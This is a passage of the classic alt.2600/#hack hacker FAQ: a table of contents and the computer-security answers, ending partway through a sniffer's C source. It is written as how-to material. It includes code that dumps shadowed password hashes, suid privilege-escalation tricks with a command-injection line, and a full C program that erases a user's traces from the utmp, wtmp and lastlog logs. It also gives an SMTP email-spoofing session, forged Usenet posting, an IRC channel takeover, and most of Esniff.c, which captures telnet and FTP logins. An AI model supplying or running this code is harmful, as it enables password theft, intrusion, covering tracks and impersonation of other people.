+			     Hacker's Haven
+			      (303)343-4053
+
+                         With greets going out to:
+
+        A-Flat, Al, Aleph1, Bluesman, Cavalier, C-Curve, DeadKat,
+        Disorder, Edison, Erik Bloodaxe, Hobbit, KCrow, Major,
+        Marauder, Novocain, Outsider, Presence, Rogue Agent, sbin,
+        Taran King, Theora, ThePublic, Tomes and TheSaint.
+
+
+		       We work in the dark
+		       We do what we can
+		       We give what we have
+		       Our doubt is our passion,
+		       and our passion is our task
+		       The rest is the madness of art.
+
+				-- Henry James
+
+
+
+Section A: Computers
+
+  01. How do I access the password file under Unix?
+  02. How do I crack Unix passwords?
+  03. What is password shadowing?
+  04. Where can I find the password file if it's shadowed?
+  05. What is NIS/yp?
+  06. What are those weird characters after the comma in my passwd file?
+  07. How do I access the password file under VMS?
+  08. How do I crack VMS passwords?
+  09. How do I break out of a restricted shell?
+  10. How do I gain root from a suid script or program?
+  11. How do I erase my presence from the system logs?
+  12. How do I send fakemail?
+  13. How do I fake posts to UseNet?
+  14. How do I hack ChanOp on IRC?
+  15. How do I modify the IRC client to hide my real username?
+  16. How to I change to directories with strange characters in them?
+  17. What is ethernet sniffing?
+  18. What is an Internet Outdial?
+  19. What are some Internet Outdials?
+  20. What is this system?
+  21. What are the default accounts for XXX ?
+  22. What port is XXX on?
+  23. What is a trojan/worm/virus/logic bomb?
+  24. How can I protect myself from viruses and such?
+  25. Where can I get more information about viruses?
+  26. What is Cryptoxxxxxxx?
+  27. What is PGP?
+  28. What is Tempest?
+  29. What is an anonymous remailer?
+  30. What are the addresses of some anonymous remailers?
+  31. How do I defeat copy protection?
+  32. What is 127.0.0.1?
+  33. How do I post to a moderated newsgroup?
+
+
+Section B: Telephony
+
+  01. What is a Red Box?
+  02. How do I build a Red Box?
+  03. Where can I get a 6.5536Mhz crystal?
+  04. Which payphones will a Red Box work on?
+  05. How do I make local calls with a Red Box?
+  06. What is a Blue Box?
+  07. Do Blue Boxes still work?
+  08. What is a Black Box?
+  09. What do all the colored boxes do?
+  10. What is an ANAC number?
+  11. What is the ANAC number for my area?
+  12. What is a ringback number?
+  13. What is the ringback number for my area?
+  14. What is a loop?
+  15. What is a loop in my area?
+  16. What is a CNA number?
+  17. What is the telephone company CNA number for my area?
+  18. What are some numbers that always ring busy?
+  19. What are some numbers that temporarily disconnect phone service?
+  20. What is scanning?
+  21. Is scanning illegal?
+  22. Where can I purchase a lineman's handset?
+  23. What are the DTMF frequencies?
+  24. What are the frequencies of the telephone tones?
+  25. What are all of the * (LASS) codes?
+  26. What frequencies do cordless phones operate on?
+  27. What is Caller-ID?
+  28. What is a PBX?
+  29. What is a VMB?
+
+
+Section C: Resources
+
+  01. What are some ftp sites of interest to hackers?
+  02. What are some fsp sites of interest to hackers?
+  03. What are some newsgroups of interest to hackers?
+  04. What are some telnet sites of interest to hackers?
+  05. What are some gopher sites of interest to hackers?
+  06. What are some World wide Web (WWW) sites of interest to hackers?
+  07. What are some IRC channels of interest to hackers?
+  08. What are some BBS's of interest to hackers?
+  09. What are some books of interest to hackers?
+  10. What are some videos of interest to hackers?
+  11. What are some mailing lists of interest to hackers?
+  12. What are some print magazines of interest to hackers?
+  13. What are some e-zines of interest to hackers?
+  14. What are some organizations of interest to hackers?
+  15. Where can I purchase a magnetic stripe encoder/decoder?
+  16. What are the rainbow books and how can I get them?
+
+
+Section D: 2600
+
+  01. What is alt.2600?
+  02. What does "2600" mean?
+  03. Are there on-line versions of 2600 available?
+  04. I can't find 2600 at any bookstores.  What can I do?
+  05. Why does 2600 cost more to subscribe to than to buy at a newsstand?
+
+
+Section E: Phrack Magazine
+
+  01. What is Phrack Magazine?
+  02. How can I reach Phrack Magazine?
+  03. Who Publishes Phrack?
+  04. How often does Phrack go out?
+  05. How do I subscribe?
+  06. Why don't I get any response when I email Phrack?
+  07. Does Phrack cost money?
+  08. How can I submit articles?
+  09. What is Phrack's PGP key?
+  10. Where can I get back issues?
+
+
+Section F: Miscellaneous
+
+  01. What does XXX stand for?
+  02. How do I determine if I have a valid credit card number?
+  03. What bank issued this credit card?
+  04. What are the ethics of hacking?
+  05. Where can I get a copy of the alt.2600/#hack FAQ?
+
+
+Section A: Computers
+~~~~~~~~~~~~~~~~~~~~
+
+01. How do I access the password file under Unix?
+
+In standard Unix the password file is /etc/passwd.  On a Unix system
+with either NIS/yp or password shadowing, much of the password data
+may be elsewhere.
+
+
+02. How do I crack Unix passwords?
+
+Contrary to popular belief, Unix passwords cannot be decrypted.  Unix
+passwords are encrypted with a one way function.  The login program
+encrypts the text you enter at the "password:" prompt and compares
+that encrypted string against the encrypted form of your password.
+
+Password cracking software uses wordlists.  Each word in the wordlist
+is encrypted and the results are compared to the encrypted form of the
+target password.
+
+The best cracking program for Unix passwords is currently Crack by
+Alec Muffett.  For PC-DOS, the best package to use is currently
+CrackerJack.
+
+
+03. What is password shadowing?
+
+Password shadowing is a security system where the encrypted password
+field of /etc/passwd is replaced with a special token and the
+encrypted password is stored in a separate file which is not readable
+by normal system users.
+
+To defeat password shadowing on many (but not all) systems, write a
+program that uses successive calls to getpwent() to obtain the
+password file.
+
+Example:
+
+#include <pwd.h>
+main()
+{
+struct passwd *p;
+while(p=getpwent())
+printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
+p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
+}
+
+
+04. Where can I find the password file if it's shadowed?
+
+Unix                  Path                            Token
+-----------------------------------------------------------------
+AIX 3                 /etc/security/passwd            !
+       or             /tcb/auth/files/<first letter   #
+                            of username>/<username>
+A/UX 3.0s             /tcb/files/auth/?/*
+BSD4.3-Reno           /etc/master.passwd              *
+ConvexOS 10           /etc/shadpw                     *
+ConvexOS 11           /etc/shadow                     *
+DG/UX                 /etc/tcb/aa/user/               *
+EP/IX                 /etc/shadow                     x
+HP-UX                 /.secure/etc/passwd             *
+IRIX 5                /etc/shadow                     x
+Linux 1.1             /etc/shadow                     *
+OSF/1                 /etc/passwd[.dir|.pag]          *
+SCO Unix #.2.x        /tcb/auth/files/<first letter   *
+                            of username>/<username>
+SunOS4.1+c2           /etc/security/passwd.adjunct    ##username
+SunOS 5.0             /etc/shadow
+                      <optional NIS+ private secure maps/tables/whatever>
+System V Release 4.0  /etc/shadow                     x
+System V Release 4.2  /etc/security/* database
+Ultrix 4              /etc/auth[.dir|.pag]            *
+UNICOS                /etc/udb                        *
+
+
+05. What is NIS/yp?
+
+NIS (Network Information System) in the current name for what was once
+known as yp (Yellow Pages).  The purpose for NIS is to allow many
+machines on a network to share configuration information, including
+password data.  NIS is not designed to promote system security.  If
+your system uses NIS you will have a very short /etc/passwd file that
+includes a line that looks like this:
+
++::0:0:::
+
+To view the real password file use this command "ypcat passwd"
+
+
+06. What are those weird characters after the comma in my passwd file?
+
+The characters are password aging data.  Password aging forces the
+user to change passwords after a System Administrator specified period
+of time.  Password aging can also force a user to keep a password for
+a certain number of weeks before changing it.
+
+]
+] Sample entry from /etc/passwd with password aging installed:
+]
+] will:5fg63fhD3d,M.z8:9406:12:Will Spencer:/home/fsg/will:/bin/bash
+]
+
+Note the comma in the encrypted password field.  The characters after
+the comma are used by the password aging mechanism.
+
+]
+] Password aging characters from above example:
+]
+] M.z8
+]
+
+The four characters are interpreted as follows:
+
+  1: Maximum number of weeks a password can be used without changing.
+  2: Minimum number of weeks a password must be used before changing.
+3&4: Last time password was changed, in number of weeks since 1970.
+
+Three special cases should be noted:
+
+If the first and second characters are set to '..' the user will be
+forced to change his/her passwd the next time he/she logs in.  The
+passwd program will then remove the passwd aging characters, and the
+user will not be subjected to password aging requirements again.
+
+If the third and fourth characters are set to '..' the user will be
+forced to change his/her passwd the next time he/she logs in. Password
+aging will then occur as defined by the first and second characters.
+
+If the first character (MAX) is less than the second character (MIN),
+the user is not allowed to change his/her password.  Only root can
+change that users password.
+
+It should also be noted that the su command does not check the password
+aging data.  An account with an expired password can be su'd to
+without being forced to change the password.
+
+
+                        Password Aging Codes
++------------------------------------------------------------------------+
+|                                                                        |
+| Character:  .  /  0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  G  H |
+|    Number:  0  1  2  3  4  5  6  7  8  9 10 11 12 13 14 15 16 17 18 19 |
+|                                                                        |
+| Character:  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  a  b |
+|    Number: 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
+|                                                                        |
+| Character:  c  d  e  f  g  h  i  j  k  l  m  n  o  p  q  r  s  t  u  v |
+|    Number: 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |
+|                                                                        |
+| Character:  w  x  y  z                                                 |
+|    Number: 60 61 62 63                                                 |
+|                                                                        |
++------------------------------------------------------------------------+
+
+
+07. How do I access the password file under VMS?
+
+Under VMS, the password file is SYS$SYSTEM:SYSUAF.DAT.  However,
+unlike Unix, most users do not have access to read the password file.
+
+
+08. How do I crack VMS passwords?
+
+Write a program that uses the SYS$GETUAF functions to compare the
+results of encrypted words against the encrypted data in SYSUAF.DAT.
+
+Two such programs are known to exist, CHECK_PASSWORD and
+GUESS_PASSWORD.
+
+
+09. How do I break out of a restricted shell?
+
+On poorly implemented restricted shells you can break out of the
+restricted environment by running a program that features a shell
+function.  A good example is vi.  Run vi and use this command:
+
+:set shell=/bin/sh
+
+then shell using this command:
+
+:shell
+
+
+10. How do I gain root from a suid script or program?
+
+1. Change IFS.
+
+If the program calls any other programs using the system() function
+call, you may be able to fool it by changing IFS.  IFS is the Internal
+Field Separator that the shell uses to delimit arguments.
+
+If the program contains a line that looks like this:
+
+system("/bin/date")
+
+and you change IFS to '/' the shell will them interpret the
+proceeding line as:
+
+bin date
+
+Now, if you have a program of your own in the path called "bin" the
+suid program will run your program instead of /bin/date.
+
+To change IFS, use this command:
+
+IFS='/';export IFS      # Bourne Shell
+setenv IFS '/'          # C Shell
+export IFS='/'          # Korn Shell
+
+
+2. link the script to -i
+
+Create a symbolic link named "-i" to the program.  Running "-i"
+will cause the interpreter shell (/bin/sh) to start up in interactive
+mode.  This only works on suid shell scripts.
+
+Example:
+
+% ln suid.sh -i
+% -i
+#
+
+
+3. Exploit a race condition
+
+Replace a symbolic link to the program with another program while the
+kernel is loading /bin/sh.
+
+Example:
+
+nice -19 suidprog ; ln -s evilprog suidroot
+
+
+4. Send bad input to the program.
+
+Invoke the name of the program and a separate command on the same
+command line.
+
+Example:
+
+suidprog ; id
+
+
+11. How do I erase my presence from the system logs?
+
+Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text
+files that can be edited by hand with vi, you must use a program
+specifically written for this purpose.
+
+Example:
+
+#include <sys/types.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <sys/file.h>
+#include <fcntl.h>
+#include <utmp.h>
+#include <pwd.h>
+#include <lastlog.h>
+#define WTMP_NAME "/usr/adm/wtmp"
+#define UTMP_NAME "/etc/utmp"
+#define LASTLOG_NAME "/usr/adm/lastlog"
+ 
+int f;
+ 
+void kill_utmp(who)
+char *who;
+{
+    struct utmp utmp_ent;
+ 
+  if ((f=open(UTMP_NAME,O_RDWR))>=0) {
+     while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
+       if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
+                 bzero((char *)&utmp_ent,sizeof( utmp_ent ));
+                 lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
+                 write (f, &utmp_ent, sizeof (utmp_ent));
+            }
+     close(f);
+  }
+}
+ 
+void kill_wtmp(who)
+char *who;
+{
+    struct utmp utmp_ent;
+    long pos;
+ 
+    pos = 1L;
+    if ((f=open(WTMP_NAME,O_RDWR))>=0) {
+ 
+     while(pos != -1L) {
+        lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
+        if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
+          pos = -1L;
+        } else {
+          if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
+               bzero((char *)&utmp_ent,sizeof(struct utmp ));
+               lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
+               write (f, &utmp_ent, sizeof (utmp_ent));
+               pos = -1L;
+          } else pos += 1L;
+        }
+     }
+     close(f);
+  }
+}
+ 
+void kill_lastlog(who)
+char *who;
+{
+    struct passwd *pwd;
+    struct lastlog newll;
+ 
+     if ((pwd=getpwnam(who))!=NULL) {
+ 
+        if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
+            lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
+            bzero((char *)&newll,sizeof( newll ));
+            write(f, (char *)&newll, sizeof( newll ));
+            close(f);
+        }
+ 
+    } else printf("%s: ?\n",who);
+}
+ 
+main(argc,argv)
+int argc;
+char *argv[];
+{
+    if (argc==2) {
+        kill_lastlog(argv[1]);
+        kill_wtmp(argv[1]);
+        kill_utmp(argv[1]);
+        printf("Zap2!\n");
+    } else
+    printf("Error.\n");
+}
+
+
+12. How do I send fakemail?
+
+Telnet to port 25 of the machine you want the mail to appear to
+originate from.  Enter your message as in this example:
+
+ HELO bellcore.com
+ MAIL FROM:Voyager@bellcore.com
+ RCPT TO:president@whitehouse.gov
+ DATA
+
+	Please discontinue your silly Clipper initiative.
+ .
+ QUIT
+
+On systems that have RFC 931 implemented, spoofing your "MAIL FROM:"
+line will not work.  Test by sending yourself fakemail first.
+
+For more information read RFC 822 "Standard for the format of ARPA
+Internet text messages."
+
+
+13. How do I fake posts to UseNet?
+
+Use inews to post.  Give inews the following lines:
+
+ From:
+ Newsgroups:
+ Subject:
+ Message-ID:
+ Date:
+ Organization:
+
+For a moderated newsgroup, inews will also require this line:
+
+ Approved:
+
+Then add your post and terminate with <Control-D>.
+
+Example:
+
+ From: Eric S. Real
+ Newsgroups: alt.hackers
+ Subject: Pathetic bunch of wannabe losers
+ Message-ID: <esr.123@locke.ccil.org>
+ Date: Fri, 13 Aug 1994 12:15:03
+ Organization: Moral Majority
+
+ A pathetic bunch of wannabe losers is what most of you are, with no
+ right to steal the honorable title of `hacker' to puff up your silly
+ adolescent egos. Get stuffed, get lost, and go to jail.
+
+                                        Eric S. Real <esr@locke.ccil.org>
+
+
+ ^D
+
+Note that many systems will append an Originator: line to your message
+header, effectively revealing the account from which the message was
+posted.
+
+
+14. How do I hack ChanOp on IRC?
+
+Find a server that is split from the rest of IRC and create your own
+channel there using the name of the channel you want ChanOp on.  When
+that server reconnects to the net, you will have ChanOp on the real
+channel.  If you have ServerOp on a server, you can cause it to split
+on purpose.
+
+
+15. How do I modify the IRC client to hide my real username?
+
+Get the IRC client from cs.bu.edu /irc/clients.  Look at the source
+code files irc.c and ctcp.c.  The code you are looking for is fairly
+easy to spot.  Change it. Change the username code in irc.c and the
+ctcp information code in ctcp.c.  Compile and run your client.
+
+Here are the diffs from a sample hack of the IRC client.  Your client
+code will vary slightly depending on what IRC client version you are
+running.
+
+*** ctcp.c.old  Wed Feb 10 10:08:05 1993
+--- ctcp.c      Fri Feb 12 04:33:55 1993
+***************
+*** 331,337 ****
+	struct  passwd  *pwd;
+	long    diff;
+	int     uid;
+!       char    c;
+  
+	/*
+	 * sojge complained that ircII says 'idle 1 seconds'
+--- 331,337 ----
+	struct  passwd  *pwd;
+	long    diff;
+	int     uid;
+!       char    c, *fing;
+  
+	/*
+	 * sojge complained that ircII says 'idle 1 seconds'
+***************
+*** 348,354 ****
+	if (uid != DAEMON_UID)
+	{
+  #endif /* DAEMON_UID */       
+!               if (pwd = getpwuid(uid))
+		{
+			char    *tmp;
+  
+--- 348,356 ----
+	if (uid != DAEMON_UID)
+	{
+  #endif /* DAEMON_UID */       
+!               if (fing = getenv("IRCFINGER"))
+!                       send_ctcp_reply(from, ctcp->name, fing, diff, c);
+!               else if (pwd = getpwuid(uid))
+		{
+			char    *tmp;
+  
+*** irc.c.old   Wed Feb 10 06:33:11 1993
+--- irc.c       Fri Feb 12 04:02:11 1993
+***************
+*** 510,516 ****
+		malloc_strcpy(&my_path, "/");
+	if (*realname == null(char))
+		strmcpy(realname, "*Unknown*", REALNAME_LEN);
+!       if (*username == null(char))
+	{
+		if (ptr = getenv("USER"))
+			strmcpy(username, ptr, NAME_LEN);
+--- 510,518 ----
+		malloc_strcpy(&my_path, "/");
+	if (*realname == null(char))
+		strmcpy(realname, "*Unknown*", REALNAME_LEN);
+!       if (ptr = getenv("IRCUSER"))
+!               strmcpy(username, ptr, NAME_LEN);
+!       else if (*username == null(char))
+	{
+		if (ptr = getenv("USER"))
+			strmcpy(username, ptr, NAME_LEN);
+
+
+16. How to I change to directories with strange characters in them?
+
+These directories are often used by people trying to hide information,
+most often warez (commercial software).
+
+There are several things you can do to determine what these strange
+characters are.  One is to use the arguments to the ls command that
+cause ls to give you more information:
+
+From the man page for ls:
+
+    -F   Causes directories to be marked with a trailing ``/'',
+	 executable files to be marked with a trailing ``*'', and
+	 symbolic links to be marked with a trailing ``@'' symbol.
+
+    -q   Forces printing of non-graphic characters in filenames as the
+	 character ``?''.
+
+    -b   Forces printing of non-graphic characters in the \ddd
+	 notation, in octal.
+
+Perhaps the most useful tool is to simply do an "ls -al filename" to
+save the directory of the remote ftp site as a file on your local
+machine.  Then you can do a "cat -t -v -e filename" to see exactly
+what those bizarre little characters are.
+
+From the man page for cat:
+
+    -v  Causes non-printing characters (with the exception of tabs,
+	newlines, and form feeds) to be displayed.  Control characters
+	are displayed as ^X (<Ctrl>x), where X is the key pressed with
+	the <Ctrl> key (for example, <Ctrl>m is displayed as ^M).  The
+	<Del> character (octal 0177) is printed as ^?.  Non-ASCII
+	characters (with the high bit set) are printed as M -x, where
+	x is the character specified by the seven low order bits.
+
+    -t  Causes tabs to be printed as ^I and form feeds as ^L.  This
+	option is ignored if the -v option is not specified.
+
+    -e  Causes a ``$'' character to be printed at the end of each line
+	(prior to the new-line).  This option is ignored if the -v
+	option is not set.
+
+If the directory name includes a <SPACE> or a <TAB> you will need to
+enclose the entire directory name in quotes.  Example:
+
+cd "..<TAB>"
+
+On an IBM-PC, you may enter these special characters by holding down
+the <ALT> key and entering the decimal value of the special character
+on your numeric keypad.  When you release the <ALT> key, the special
+character should appear on your screen.  An ASCII chart can be very
+helpful.
+
+Sometimes people will create directories with some of the standard
+stty control characters in them, such as ^Z (suspend) or ^C (intr).
+To get into those directories, you will first need to user stty to
+change the control character in qustion to another character.
+
+From the man page for stty:
+
+    Control assignments
+
+    control-character C
+                      Sets control-character to C, where control-character is
+                      erase, kill, intr (interrupt), quit, eof, eol, swtch
+                      (switch), start, stop or susp.
+
+                      start and stop are available as possible control char-
+                      acters for the control-character C assignment.
+
+                      If C is preceded by a caret (^) (escaped from the
+                      shell), then the value used is the corresponding con-
+                      trol character (for example, ^D is a <Ctrl>d; ^? is
+                      interpreted as DELETE and ^- is interpreted as unde-
+                      fined).
+
+Use the stty -a command to see your current stty settings, and to
+determine which one is causing you problems.
+
+
+17. What is ethernet sniffing?
+
+Ethernet sniffing is listening (with software) to the raw ethernet
+device for packets that interest you.  When your software sees a
+packet that fits certain criteria, it logs it to a file.  The most
+common criteria for an interesting packet is one that contains words
+like "login" or "password."
+
+Many ethernet sniffers are available, here are a few that may be on
+your system now:
+
+OS              Sniffer
+~~              ~~~~~~~
+HP/UX           nettl (monitor) & netfmt (display)
+                nfswatch        /* Available via anonymous ftp           */
+Irix            nfswatch        /* Available via anonymous ftp           */
+                Etherman
+SunOS           etherfind
+                nfswatch        /* Available via anonymous ftp           */
+Solaris         snoop
+DOS             ETHLOAD         /* Available via anonymous ftp as        */
+                                /* ethld104.zip                          */
+                The Gobbler     /* Available via anonymous ftp           */
+                LanPatrol
+                LanWatch
+		Netmon
+                Netwatch
+                Netzhack        /* Available via anonymous ftp at        */
+                                /* mistress.informatik.unibw-muenchen.de */
+                                /* /pub/netzhack.mac                     */
+Macintosh       Etherpeek
+
+Here is source code for an ethernet sniffer:
+
+/* Esniff.c */
+
+#include <stdio.h>
+#include <ctype.h>
+#include <string.h>
+
+#include <sys/time.h>
+#include <sys/file.h>
+#include <sys/stropts.h>
+#include <sys/signal.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/ioctl.h>
+
+#include <net/if.h>
+#include <net/nit_if.h>
+#include <net/nit_buf.h>
+#include <net/if_arp.h>
+
+#include <netinet/in.h>
+#include <netinet/if_ether.h>
+#include <netinet/in_systm.h>
+#include <netinet/ip.h>
+#include <netinet/udp.h>
+#include <netinet/ip_var.h>
+#include <netinet/udp_var.h>
+#include <netinet/in_systm.h>
+#include <netinet/tcp.h>
+#include <netinet/ip_icmp.h>
+
+#include <netdb.h>
+#include <arpa/inet.h>
+
+#define ERR stderr
+
+char    *malloc();
+char    *device,
+        *ProgName,
+        *LogName;
+FILE    *LOG;
+int     debug=0;
+
+#define NIT_DEV     "/dev/nit"
+#define CHUNKSIZE   4096        /* device buffer size */
+int     if_fd = -1;
+int     Packet[CHUNKSIZE+32];
+
+void Pexit(err,msg)
+int err; char *msg;
+{ perror(msg);
+  exit(err); }
+
+void Zexit(err,msg)
+int err; char *msg;
+{ fprintf(ERR,msg);
+  exit(err); }
+
+#define IP          ((struct ip *)Packet)
+#define IP_OFFSET   (0x1FFF)
+#define SZETH       (sizeof(struct ether_header))
+#define IPLEN       (ntohs(ip->ip_len))
+#define IPHLEN      (ip->ip_hl)
+#define TCPOFF      (tcph->th_off)
+#define IPS         (ip->ip_src)
+#define IPD         (ip->ip_dst)
+#define TCPS        (tcph->th_sport)
+#define TCPD        (tcph->th_dport)
+#define IPeq(s,t)   ((s).s_addr == (t).s_addr)
+
+#define TCPFL(FLAGS) (tcph->th_flags & (FLAGS))
+
+#define MAXBUFLEN  (128)
+time_t  LastTIME = 0;
+
+struct CREC {
+     struct CREC *Next,
+                 *Last;
+     time_t  Time;              /* start time */
+     struct in_addr SRCip,
+                    DSTip;
+     u_int   SRCport,           /* src/dst ports */
+             DSTport;
+     u_char  Data[MAXBUFLEN+2]; /* important stuff :-) */
+     u_int   Length;            /* current data length */
+     u_int   PKcnt;             /* # pkts */
+     u_long  LASTseq;
+};
+
+struct CREC *CLroot = NULL;
+
+char *Symaddr(ip)
+register struct in_addr ip;
+{ register struct hostent *he =
+      gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET);
+
+  return( (he)?(he->h_name):(inet_ntoa(ip)) );
+}
+
+char *TCPflags(flgs)
+register u_char flgs;
+{ static char iobuf[8];
+#define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-')
+
+  SFL(0,TH_FIN, 'F');
+  SFL(1,TH_SYN, 'S');
+  SFL(2,TH_RST, 'R');
+  SFL(3,TH_PUSH,'P');
+  SFL(4,TH_ACK, 'A');
+  SFL(5,TH_URG, 'U');
+  iobuf[6]=0;
+  return(iobuf);
+}
+
+char *SERVp(port)
+register u_int port;
+{ static char buf[10];
+  register char *p;
+
+   switch(port) {
+     case IPPORT_LOGINSERVER: p="rlogin"; break;
+     case IPPORT_TELNET:      p="telnet"; break;
+     case IPPORT_SMTP:        p="smtp"; break;
+     case IPPORT_FTP:         p="ftp"; break;
+     default: sprintf(buf,"%u",port); p=buf; break;
+   }
+   return(p);
+}
+
+char *Ptm(t)
+register time_t *t;
+{ register char *p = ctime(t);
+  p[strlen(p)-6]=0; /* strip " YYYY\n" */
+  return(p);
+}
+
+char *NOWtm()
+{ time_t tm;
+  time(&tm);
+  return( Ptm(&tm) );
+}
+
+#define MAX(a,b) (((a)>(b))?(a):(b))
+#define MIN(a,b) (((a)<(b))?(a):(b))
+
+/* add an item */
+#define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \
+  register struct CREC *CLtmp = \
+        (struct CREC *)malloc(sizeof(struct CREC)); \
+  time( &(CLtmp->Time) ); \
+  CLtmp->SRCip.s_addr = SIP.s_addr; \
+  CLtmp->DSTip.s_addr = DIP.s_addr; \
+  CLtmp->SRCport = SPORT; \
+  CLtmp->DSTport = DPORT; \
+  CLtmp->Length = MIN(LEN,MAXBUFLEN); \
+  bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \
+  CLtmp->PKcnt = 1; \
+  CLtmp->Next = CLroot; \
+  CLtmp->Last = NULL; \
+  CLroot = CLtmp; \
+}
+
+register struct CREC *GET_NODE(Sip,SP,Dip,DP)
+register struct in_addr Sip,Dip;
+register u_int SP,DP;
+{ register struct CREC *CLr = CLroot;
+
+  while(CLr != NULL) {
+    if( (CLr->SRCport == SP) && (CLr->DSTport == DP) &&
+        IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) )
+            break;
+    CLr = CLr->Next;
+  }
+  return(CLr);
+}
+
+#define ADDDATA_NODE(CL,DATA,LEN) { \
+ bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \
+ CL->Length += LEN; \
+}
+
+#define PR_DATA(dp,ln) {    \
+  register u_char lastc=0; \
+  while(ln-- >0) { \
+     if(*dp < 32) {  \
+        switch(*dp) { \
+            case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \
+                        break; \
+            case '\r': \
+            case '\n': fprintf(LOG,"\n     : "); \
+                        break; \
+            default  : fprintf(LOG,"^%c", (*dp + 64)); \
+                        break; \
+        } \
+     } else { \
+        if(isprint(*dp)) fputc(*dp,LOG); \
+        else fprintf(LOG,"(%d)",*dp); \
+     } \
+     lastc = *dp++; \
+  } \
+  fflush(LOG); \
+}
+
+void END_NODE(CLe,d,dl,msg)
+register struct CREC *CLe;
+register u_char *d;
+register int dl;
+register char *msg;
+{
+   fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time));
+   fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport));
+   fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport));
+   fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n",
+                        NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg);
+   fprintf(LOG," DATA: ");
+    { register u_int i = CLe->Length;
+      register u_char *p = CLe->Data;
+      PR_DATA(p,i);
+      PR_DATA(d,dl);
+    }
+
+   fprintf(LOG,"\n-- \n");
+   fflush(LOG);
+
+   if(CLe->Next != NULL)
+    CLe->Next->Last = CLe->Last;
+   if(CLe->Last != NULL)
+    CLe->Last->Next = CLe->Next;
+   else
+    CLroot = CLe->Next;
+   free(CLe);
+}
+
+/* 30 mins (x 60 seconds) */
+#define IDLE_TIMEOUT 1800
+#define IDLE_NODE() { \
+  time_t tm; \
+  time(&tm); \
+  if(LastTIME<tm) { \
+     register struct CREC *CLe,*CLt = CLroot; \
+     LastTIME=(tm+IDLE_TIMEOUT); tm-=IDLE_TIMEOUT; \
+     while(CLe=CLt) { \
+       CLt=CLe->Next; \
+       if(CLe->Time <tm) \
+           END_NODE(CLe,(u_char *)NULL,0,"IDLE TIMEOUT"); \
+     } \
+  } \
+}
+
+void filter(cp, pktlen)
+register char *cp;
+register u_int pktlen;
+{
+ register struct ip     *ip;
+ register struct tcphdr *tcph;
+
+ { register u_short EtherType=ntohs(((struct ether_header *)cp)->ether_type);
+
+   if(EtherType < 0x600) {
+     EtherType = *(u_short *)(cp + SZETH + 6);
+     cp+=8; pktlen-=8;
+   }
+
+   if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */
+      return;
+ }
+
+    /* ugh, gotta do an alignment :-( */
+ bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH));
+
+ ip = (struct ip *)Packet;
+ if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */
+    return;
+ tcph = (struct tcphdr *)(Packet + IPHLEN);
+
+ if(!( (TCPD == IPPORT_TELNET) ||
+       (TCPD == IPPORT_LOGINSERVER) ||
+       (TCPD == IPPORT_FTP)
+   )) return;
+
+ { register struct CREC *CLm;
+   register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4));
+   register u_char *p = (u_char *)Packet;
+
+   p += ((IPHLEN * 4) + (TCPOFF * 4));
+
+ if(debug) {
+  fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length);
+  fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS));
+  fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD));
+ }
+
+   if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) {
+
+      CLm->PKcnt++;
+
+      if(length>0)
+        if( (CLm->Length + length) < MAXBUFLEN ) {
+          ADDDATA_NODE( CLm, p,length);
+        } else {
+          END_NODE( CLm, p,length, "DATA LIMIT");
+        }
+
+      if(TCPFL(TH_FIN|TH_RST)) {
+          END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" );
+      }
+
+   } else {
+
+      if(TCPFL(TH_SYN)) {
+         ADD_NODE(IPS,IPD,TCPS,TCPD,p,length);
+      }
+
+   }
+
+   IDLE_NODE();
+
+ }
+
+}
+
+/* signal handler
+ */
+void death()
+{ register struct CREC *CLe;
+
+    while(CLe=CLroot)
+        END_NODE( CLe, (u_char *)NULL,0, "SIGNAL");
+
+    fprintf(LOG,"\nLog ended at => %s\n",NOWtm());
+    fflush(LOG);
+    if(LOG != stdout)
+        fclose(LOG);
+    exit(1);
+}
+
+/* opens network interface, performs ioctls and reads from it,
+ * passing data to filter function
+ */
+void do_it()
+{
+    int cc;
+    char *buf;
+    u_short sp_ts_len;
+
+    if(!(buf=malloc(CHUNKSIZE)))
+        Pexit(1,"Eth: malloc");
+
+/* this /dev/nit initialization code pinched from etherfind */
+  {
+    struct strioctl si;
